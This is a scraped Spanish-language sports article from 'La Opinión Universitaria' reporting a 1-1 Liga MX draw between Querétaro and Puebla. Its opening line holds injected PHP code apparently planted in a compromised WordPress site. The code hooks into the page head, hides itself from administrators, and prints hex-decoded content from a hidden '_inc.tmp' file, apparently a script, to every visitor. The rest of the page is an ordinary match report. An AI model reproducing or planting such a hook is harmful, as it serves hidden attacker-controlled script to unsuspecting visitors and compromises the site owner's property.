if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Puebla le arranca un punto a Gallos sobre la hora – La Opinión Universitaria La Opinión Universitaria
Menu

Puebla le arranca un punto a Gallos sobre la hora

Desde el Estadio Corregidora, Querétaro y Puebla empataron 1-1, en un duelo de mucha intensidad correspondiente a la jornada 7 del Guard1anes 2021, con mucho orden y planteamientos tácticos, entre Héctor Altamirano y Nicolás Larcamón, que además son los dos estrategas más jóvenes de la Liga MX.

Una primera parte de mucha intensidad, sin un amplio dominador en el terreno de juego, ya que ambos equipos analizaron diversas opciones para hacerse daño, sin embargo, el juego defensivo predominó el partido. Transcurrieron los primeros 45 minutos y muy poca claridad en el último tercio por parte de ambas escuadras, el partido se volvió sumamente equilibrado y sin hacerse daño se fueron al descanso.

Para la parte complementaria, la visita buscó sorprender a los Gallos pero el orden defensivo de los locales evitó alguna campanada, no pasó mucho para que Daniel Aguilar le pusiera un pase de gol a Javier Salas, quien remató solo en el área, sin embargo, Gil Alcalá atajó a una mano y así guardar el cero, apenas a los 60 minutos de tiempo corrido.